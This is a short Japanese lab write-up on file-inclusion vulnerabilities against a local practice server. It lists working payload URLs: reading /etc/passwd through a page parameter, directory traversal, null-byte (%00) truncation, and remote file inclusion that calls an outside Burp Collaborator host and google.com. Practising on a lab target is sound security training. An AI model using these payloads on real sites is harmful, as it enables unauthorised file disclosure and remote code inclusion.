Hello there, ('ω')ノ
File Includeを。
まずは、Example1を。
ツールの制度を確かめるためにもアクティブスキャンを。
スキャンで使われたペイロードを理解して、シンプルなものを。
http://192.168.0.204/fileincl/example1.php?page=/etc/passwd
帯域外リソースロードについても出ていたので確認を。
http://192.168.0.204/fileincl/example1.php?page=http://5djq9oakzgd045vj3ferzxshh8n1bszin9azyo.burpcollaborator.net/?intro.php
次にExample2を。
ペイロードの内容は、デコードして確認を。
デコードしたペイロードをそのまま挿入しても結果を得られず。
http://192.168.0.204/fileincl/example2.php?page=../../../../../../../../../../../../../../../../etc/passwdintro
URLエンコードのペイロードの内容をよくみるとヌルバイトが追加されていたので。
phpがNull文字を検出すると、残りのコードは実行されないので。
ブラウザからNullを送信するには、エンコード形式(%00)を使用する必要があって。
http://192.168.0.204/fileincl/example2.php?page=http://google.com%00
他には、拡張子を除いたケースなどいろいろと。
http://192.168.0.204/fileincl/example2.php?page=http://192.168.0.204/index
Best regards, (^^ゞ